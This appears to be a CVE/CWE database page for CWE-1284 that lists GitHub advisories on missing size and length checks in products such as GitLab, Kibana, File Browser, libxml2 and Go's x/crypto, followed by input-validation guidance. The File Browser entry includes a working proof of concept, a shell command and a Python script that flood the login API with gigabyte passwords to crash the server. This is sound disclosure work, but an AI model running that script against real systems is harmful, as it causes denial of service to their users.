Common Weakness Enumeration

CWE-1284

Allowed

Improper Validation of Specified Quantity in Input

Abstraction: Base · Status: Incomplete

The product receives input that is expected to specify a quantity (such as size or length), but it does not validate or incorrectly validates that the quantity has the required properties.

494 vulnerabilities reference this CWE, most recent first.

GHSA-VCHR-42H7-32XH

Vulnerability from github – Published: 2022-02-11 00:00 – Updated: 2025-10-22 00:32
VLAI
Details

Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-20699"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-121",
      "CWE-1284",
      "CWE-787"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-02-10T18:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.",
  "id": "GHSA-vchr-42h7-32xh",
  "modified": "2025-10-22T00:32:29Z",
  "published": "2022-02-11T00:00:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-20699"
    },
    {
      "type": "WEB",
      "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-20699"
    },
    {
      "type": "WEB",
      "url": "https://www.zerodayinitiative.com/advisories/ZDI-22-414"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/167113/Cisco-RV340-SSL-VPN-Unauthenticated-Remote-Code-Execution.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VJFF-3WCF-GWP3

Vulnerability from github – Published: 2026-04-09 00:32 – Updated: 2026-04-09 00:32
VLAI
Details

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service by sending repeated GraphQL queries.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-12664"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1284"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-08T23:16:56Z",
    "severity": "HIGH"
  },
  "details": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service by sending repeated GraphQL queries.",
  "id": "GHSA-vjff-3wcf-gwp3",
  "modified": "2026-04-09T00:32:01Z",
  "published": "2026-04-09T00:32:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12664"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/3377091"
    },
    {
      "type": "WEB",
      "url": "https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/579376"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VJV2-PP4X-76X9

Vulnerability from github – Published: 2025-05-08 21:32 – Updated: 2025-05-08 21:32
VLAI
Details

On affected platforms running Arista EOS with Traffic Policies configured the vulnerability will cause received untagged packets not to hit Traffic Policy rules that they are expected to hit. If the rule was to drop the packet, the packet will not be dropped and instead will be forwarded as if the rule was not in place. This could lead to packets being delivered to unexpected destinations.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-9448"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1284"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-08T20:15:28Z",
    "severity": "HIGH"
  },
  "details": "On affected platforms running Arista EOS with Traffic Policies configured the vulnerability will cause received untagged packets not to hit Traffic Policy rules that they are expected to hit. If the rule was to drop the packet, the packet will not be dropped and instead will be forwarded as if the rule was not in place. This could lead to packets being delivered to unexpected destinations.",
  "id": "GHSA-vjv2-pp4x-76x9",
  "modified": "2025-05-08T21:32:56Z",
  "published": "2025-05-08T21:32:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9448"
    },
    {
      "type": "WEB",
      "url": "https://www.arista.com/en/support/advisories-notices/security-advisory/21121-security-advisory-0112"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VPQ7-M4QM-P2GP

Vulnerability from github – Published: 2022-02-16 00:01 – Updated: 2023-06-30 20:09
VLAI
Summary
Microweber vulnerable to Improper Validation of Specified Quantity in Input
Details

Microweber prior to version 1.2.11 can have a negative product amount. This could allow an attacker to manipulate the total value and get products for free.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "microweber/microweber"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.2.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-0596"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1284"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-02-16T22:49:11Z",
    "nvd_published_at": "2022-02-15T14:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Microweber prior to version 1.2.11 can have a negative product amount. This could allow an attacker to manipulate the total value and get products for free.",
  "id": "GHSA-vpq7-m4qm-p2gp",
  "modified": "2023-06-30T20:09:24Z",
  "published": "2022-02-16T00:01:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-0596"
    },
    {
      "type": "WEB",
      "url": "https://github.com/microweber/microweber/commit/91a9d899741557c75050614ff7adb8c0e3feb005"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/microweber/microweber"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/f68b994e-2b8b-49f5-af2a-8cd99e8048a5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Microweber vulnerable to Improper Validation of Specified Quantity in Input"
}

GHSA-VVXG-3V44-FPQX

Vulnerability from github – Published: 2026-02-26 18:31 – Updated: 2026-02-26 18:31
VLAI
Details

Improper Validation of Specified Quantity in Input (CWE-1284) in Kibana can allow an authenticated attacker with view-only privileges to cause a Denial of Service via Input Data Manipulation (CAPEC-153). An attacker can send a specially crafted, malformed payload causing excessive resource consumption and resulting in Kibana becoming unresponsive or crashing.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-26934"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1284"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-26T18:23:07Z",
    "severity": "MODERATE"
  },
  "details": "Improper Validation of Specified Quantity in Input (CWE-1284) in Kibana can allow an authenticated attacker with view-only privileges to cause a Denial of Service via Input Data Manipulation (CAPEC-153). An attacker can send a specially crafted, malformed payload causing excessive resource consumption and resulting in Kibana becoming unresponsive or crashing.",
  "id": "GHSA-vvxg-3v44-fpqx",
  "modified": "2026-02-26T18:31:41Z",
  "published": "2026-02-26T18:31:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26934"
    },
    {
      "type": "WEB",
      "url": "https://discuss.elastic.co/t/kibana-8-19-12-9-2-6-9-3-1-security-update-esa-2026-12/385248"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-W4FH-MW73-5C5W

Vulnerability from github – Published: 2023-02-14 00:30 – Updated: 2023-02-27 18:32
VLAI
Details

A lack of length validation in GitLab CE/EE affecting all versions from 12.4 before 15.6.7, 15.7 before 15.7.6, and 15.8 before 15.8.1 allows an authenticated attacker to create a large Issue description via GraphQL which, when repeatedly requested, saturates CPU usage.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-3411"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1284",
      "CWE-20",
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-02-13T23:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A lack of length validation in GitLab CE/EE affecting all versions from 12.4 before 15.6.7, 15.7 before 15.7.6, and 15.8 before 15.8.1 allows an authenticated attacker to create a large Issue description via GraphQL which, when repeatedly requested, saturates CPU usage.",
  "id": "GHSA-w4fh-mw73-5c5w",
  "modified": "2023-02-27T18:32:02Z",
  "published": "2023-02-14T00:30:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3411"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/1685995"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-3411.json"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/376247"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-W5FM-68J4-FPC4

Vulnerability from github – Published: 2026-06-12 21:51 – Updated: 2026-06-12 21:51
VLAI
Summary
File Browser has a DoS Vulnerability via Public Login API
Details

Summary

Unchecked passwords maximums allow for an arbitrarily large password to be passed into the login API. This spikes CPU and memory, and after testing, crashes, heavily lags any container created, and has even made my docker daemon start to send errors with status code 500 even after the container was destroyed.

Details

When sending JSON in the body of the request to the route api/login, if a large password is sent, there is no checking on a maximum length password. This means that any length string can be sent to the server and it will be hashed. Specifically the function CheckPwd in users/password.go is called to hash and check to see if the user supplied password is valid, but there is no maximum length for the password checked in that function. Depending on how many concurrent requests are being made, there may be no logs about the failed login attempts.

PoC

Create a file with a large password using this command:

yes "thisisalongphraseithinksoyeahitisactuallyimsureitiswhatisthisisamouthwoahimcoolwheredidthiscomefromwowza" | head -n 10000000 > large-password.txt

This makes a file that's about a gigabyte. The n parameter in the head function can be adjusted to increase or decrease the file size. Afterwards, run the following script to make a filebrowser container:

docker run -v filebrowser_data:/srv -v filebrowser_database:/database -v filebrowser_config:/config -p 8080:80 filebrowser/filebrowser

After running the container, it is recommended to bring up some sort of performance dashboard on the container that is running to monitor CPU and memory usage. Afterwards, run the following Python script (make sure to install dependencies: pip install aiohttp asyncio). The CONCURRENT_REQUESTS parameter controls the number of requests to be making at one time. The TOTAL_REQUESTS parameter controls the grand total number of requests sent to the targeted container. If one wants more severe results, turn it up. If one wants less severe results, turn it down. The setting it's on right now is where I've found it can either crash the targeted container or just make it lag until it doesn't respond but is still on.

import aiohttp
import asyncio
from time import perf_counter

url = 'http://localhost:8080/api/login'
CONCURRENT_REQUESTS = 30
TOTAL_REQUESTS = 1000
async def make_request(session, body, semaphore):
    async with semaphore:
        try:
            async with session.post(url, json=body) as response:
                print(response.status)
        except asyncio.TimeoutError:
            print('Request timed out')
        except aiohttp.ConnectionTimeoutError:
            print('Request timed out')
        except Exception as e:
            print(f"Unexpected error {e}")

async def main():
    with open("./large-password.txt", "r") as f:
        file_contents = f.read()

    body = {
        "username": "admin",
        "password": file_contents,
        "recaptcha": ""
    }

    headers = {"Content-Type": "application/json"}
    semaphore = asyncio.Semaphore(CONCURRENT_REQUESTS)

    async with aiohttp.ClientSession(headers=headers) as session:
        tasks = [
            make_request(session, body, semaphore)
            for _ in range(TOTAL_REQUESTS)  
        ]

        start = perf_counter()
        await asyncio.gather(*tasks)
        end = perf_counter()

        print(f"Completed {len(tasks)} requests in {end - start:.2f} seconds")

if __name__ == "__main__":
    asyncio.run(main())

Impact

The vulnerability impacts anyone who uses this service.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.63.5"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/filebrowser/filebrowser/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.63.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/filebrowser/filebrowser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.11.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-54092"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1284",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-12T21:51:24Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nUnchecked passwords maximums allow for an arbitrarily large password to be passed into the login API. This spikes CPU and memory, and after testing, crashes, heavily lags any container created, and has even made my docker daemon start to send errors with status code 500 even after the container was destroyed.\n\n### Details\nWhen sending JSON in the body of the request to the route `api/login`, if a large password is sent, there is no checking on a maximum length password. This means that any length string can be sent to the server and it will be hashed. Specifically the function `CheckPwd` in `users/password.go` is called to hash and check to see if the user supplied password is valid, but there is no maximum length for the password checked in that function. Depending on how many concurrent requests are being made, there may be no logs about the failed login attempts.\n\n### PoC\nCreate a file with a large password using this command:\n```bash\nyes \"thisisalongphraseithinksoyeahitisactuallyimsureitiswhatisthisisamouthwoahimcoolwheredidthiscomefromwowza\" | head -n 10000000 \u003e large-password.txt\n```\nThis makes a file that\u0027s about a gigabyte. The `n` parameter in the head function can be adjusted to increase or decrease the file size. Afterwards, run the following script to make a filebrowser container:\n```bash\ndocker run -v filebrowser_data:/srv -v filebrowser_database:/database -v filebrowser_config:/config -p 8080:80 filebrowser/filebrowser\n```\n\nAfter running the container, it is recommended to bring up some sort of performance dashboard on the container that is running to monitor CPU and memory usage. Afterwards, run the following Python script (make sure to install dependencies: `pip install aiohttp asyncio `). The `CONCURRENT_REQUESTS` parameter controls the number of requests to be making at one time. The `TOTAL_REQUESTS` parameter controls the grand total number of requests sent to the targeted container. If one wants more severe results, turn it up. If one wants less severe results, turn it down. The setting it\u0027s on right now is where I\u0027ve found it can either crash the targeted container or just make it lag until it doesn\u0027t respond but is still on.\n\n```python\nimport aiohttp\nimport asyncio\nfrom time import perf_counter\n\nurl = \u0027http://localhost:8080/api/login\u0027\nCONCURRENT_REQUESTS = 30\nTOTAL_REQUESTS = 1000\nasync def make_request(session, body, semaphore):\n    async with semaphore:\n        try:\n            async with session.post(url, json=body) as response:\n                print(response.status)\n        except asyncio.TimeoutError:\n            print(\u0027Request timed out\u0027)\n        except aiohttp.ConnectionTimeoutError:\n            print(\u0027Request timed out\u0027)\n        except Exception as e:\n            print(f\"Unexpected error {e}\")\n\nasync def main():\n    with open(\"./large-password.txt\", \"r\") as f:\n        file_contents = f.read()\n\n    body = {\n        \"username\": \"admin\",\n        \"password\": file_contents,\n        \"recaptcha\": \"\"\n    }\n\n    headers = {\"Content-Type\": \"application/json\"}\n    semaphore = asyncio.Semaphore(CONCURRENT_REQUESTS)\n\n    async with aiohttp.ClientSession(headers=headers) as session:\n        tasks = [\n            make_request(session, body, semaphore)\n            for _ in range(TOTAL_REQUESTS)  \n        ]\n\n        start = perf_counter()\n        await asyncio.gather(*tasks)\n        end = perf_counter()\n\n        print(f\"Completed {len(tasks)} requests in {end - start:.2f} seconds\")\n\nif __name__ == \"__main__\":\n    asyncio.run(main())\n```\n\n### Impact\nThe vulnerability impacts anyone who uses this service.",
  "id": "GHSA-w5fm-68j4-fpc4",
  "modified": "2026-06-12T21:51:24Z",
  "published": "2026-06-12T21:51:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-w5fm-68j4-fpc4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/commit/847d08bdd135e5c3659f2e6dea2f0cd36617af9b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/filebrowser/filebrowser"
    },
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.63.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "File Browser has a DoS Vulnerability via Public Login API"
}

GHSA-W79P-PHHC-5R23

Vulnerability from github – Published: 2024-05-20 12:30 – Updated: 2026-05-12 12:31
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

Bluetooth: L2CAP: Fix not validating setsockopt user input

Check user input length before copying data.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-35965"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1284"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-20T10:15:11Z",
    "severity": "HIGH"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: L2CAP: Fix not validating setsockopt user input\n\nCheck user input length before copying data.",
  "id": "GHSA-w79p-phhc-5r23",
  "modified": "2026-05-12T12:31:50Z",
  "published": "2024-05-20T12:30:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35965"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/28234f8ab69c522ba447f3e041bbfbb284c5959a"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/4f3951242ace5efc7131932e2e01e6ac6baed846"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/8ee0c132a61df9723813c40e742dc5321824daa9"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/9d42f373391211c7c8af66a3a316533a32b8a607"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/f13b04cf65a86507ff15a9bbf37969d25be3e2a0"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/03/msg00002.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-W879-237Q-WC7R

Vulnerability from github – Published: 2026-06-25 22:18 – Updated: 2026-07-10 12:31
VLAI
Summary
golang.org/x/crypto: Invoking pathological RSA/DSA parameters may cause DoS
Details

The RSA and DSA public key parsers did not enforce size limits on key parameters. A crafted public key with an excessively large modulus or DSA parameter could cause several minutes of CPU consumption during signature verification. This could be triggered by unauthenticated clients during public key authentication. RSA moduli are now limited to 8192 bits, and DSA parameters are validated per FIPS 186-2.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "golang.org/x/crypto"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.52.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39829"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1284",
      "CWE-347"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-25T22:18:43Z",
    "nvd_published_at": "2026-05-22T04:16:22Z",
    "severity": "HIGH"
  },
  "details": "The RSA and DSA public key parsers did not enforce size limits on key parameters. A crafted public key with an excessively large modulus or DSA parameter could cause several minutes of CPU consumption during signature verification. This could be triggered by unauthenticated clients during public key authentication. RSA moduli are now limited to 8192 bits, and DSA parameters are validated per FIPS 186-2.",
  "id": "GHSA-w879-237q-wc7r",
  "modified": "2026-07-10T12:31:34Z",
  "published": "2026-06-25T22:18:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39829"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:37268"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:37271"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:37272"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:37278"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:37286"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:37296"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:37387"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2026-39829"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2480681"
    },
    {
      "type": "PACKAGE",
      "url": "https://cs.opensource.google/go/x/crypto"
    },
    {
      "type": "WEB",
      "url": "https://go.dev/cl/781641"
    },
    {
      "type": "WEB",
      "url": "https://go.dev/cl/781661"
    },
    {
      "type": "WEB",
      "url": "https://go.dev/issue/79565"
    },
    {
      "type": "WEB",
      "url": "https://groups.google.com/g/golang-announce/c/a082jnz-LvI"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2026-5018"
    },
    {
      "type": "WEB",
      "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-39829.json"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:26546"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:26547"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:29455"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:35833"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:36199"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:36207"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:36319"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:36625"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:36648"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:36651"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:36796"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:36797"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:36808"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:36820"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:36883"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:37072"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2026:37123"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "golang.org/x/crypto: Invoking pathological RSA/DSA parameters may cause DoS"
}

GHSA-W8FW-FJ9Q-VCJJ

Vulnerability from github – Published: 2025-04-17 18:31 – Updated: 2025-11-03 21:33
VLAI
Details

In libxml2 before 2.13.8 and 2.14.x before 2.14.2, xmlSchemaIDCFillNodeTables in xmlschemas.c has a heap-based buffer under-read. To exploit this, a crafted XML document must be validated against an XML schema with certain identity constraints, or a crafted XML schema must be used.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-32415"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-125",
      "CWE-1284"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-04-17T17:15:33Z",
    "severity": "LOW"
  },
  "details": "In libxml2 before 2.13.8 and 2.14.x before 2.14.2, xmlSchemaIDCFillNodeTables in xmlschemas.c has a heap-based buffer under-read. To exploit this, a crafted XML document must be validated against an XML schema with certain identity constraints, or a crafted XML schema must be used.",
  "id": "GHSA-w8fw-fj9q-vcjj",
  "modified": "2025-11-03T21:33:40Z",
  "published": "2025-04-17T18:31:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32415"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/890"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00041.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation MIT-5
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

No CAPEC attack patterns related to this CWE.